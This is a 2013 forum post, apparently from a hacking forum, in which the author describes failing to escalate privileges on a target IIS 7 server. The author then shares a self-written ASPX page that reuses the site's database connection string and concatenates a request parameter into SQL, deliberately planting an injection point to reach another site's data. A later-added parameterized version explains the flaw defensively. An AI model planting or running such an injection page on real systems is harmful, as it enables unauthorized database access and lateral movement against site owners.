Title: Using a crafted ASPX injection to cross over to another site
Author: admin    Time: 2013-3-20 21:32

Yesterday 4z1 and I were looking at a site. Privilege escalation was really hard; we spent a full 5 hours on it with no result. Server 2008 + IIS 7, no sa, no root, none of the usual services...
In the process we actually used a crafted ASPX injection to cross over to another site. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own and had done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    // Open the database using the connection string the site already defines in web.config
    // ("连接名" is the name of that connection string entry)
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();
    string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1
    // The parameter is pasted straight into the SQL text; that concatenation is what makes the page injectable
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    int x = command.ExecuteNonQuery(); // returns affected rows, or -1 for a plain SELECT
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}
</script>
</div>
</form>
</body>
</html>
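For comparison, here is the same page with ?xxser= bound as a typed parameter. This is an added example, not the post's code: it shows that the page above only works because the value is concatenated into the SQL text, and that binding it as data closes that path. The names 连接名, [表] and 列名 are the post's own placeholders and are assumed to stand for a real connection-string entry, table and integer column.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
// Hardened counterpart of the injectable page: the value of ?xxser= is sent to
// SQL Server as a typed parameter, so it can never change the statement's structure.
// Placeholders "连接名", [表] and 列名 are assumed to match the post's web.config and schema.
void Page_Init(object sender, EventArgs e)
{
    string raw = Request.Params["xxser"];
    int id;
    if (!int.TryParse(raw, out id))           // accept only a plain integer
    {
        Response.StatusCode = 400;
        Response.Write("bad parameter");
        return;
    }

    string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    using (SqlConnection conn = new SqlConnection(cs))
    using (SqlCommand cmd = new SqlCommand("select * from [表] where 列名 = @id", conn))
    {
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;   // bound as data, not SQL text
        conn.Open();
        using (SqlDataReader rd = cmd.ExecuteReader())          // ExecuteNonQuery would return -1 for a SELECT
        {
            int rows = 0;
            while (rd.Read()) rows++;
            Response.Write(HttpUtility.HtmlEncode(raw) + "\n");  // encode before echoing user input
            Response.Write(rows);
        }
    }
}
</script>
```

With this version a request such as ?xxser=1 or 1=1 is rejected outright, and even a numeric value can only ever be compared against the column.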